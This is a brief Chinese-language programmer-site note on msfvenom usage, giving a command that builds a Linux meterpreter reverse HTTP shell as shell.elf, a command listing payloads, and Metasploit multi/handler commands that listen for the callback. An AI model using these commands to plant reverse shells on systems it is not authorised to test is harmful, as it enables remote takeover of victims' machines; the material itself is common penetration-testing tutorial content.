欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

msfvenom 使用

程序员文章站 2024-03-19 13:44:16
...

参考:

https://blog.csdn.net/caiqiiqi/article/details/70768972

https://blog.csdn.net/whatday/article/details/82904623

 

比如,我们要生成一个在Linux平台下使用的elf,可以使用如下命令:

msfvenom -p linux/x86/meterpreter_reverse_http  LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

查看payload可以使用

msfvenom -l payloads | grep linux

msf监听命令

use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_http
set LHOST 192.168.1.120
set LPORT XXXX
run

 

相关标签: Metasploit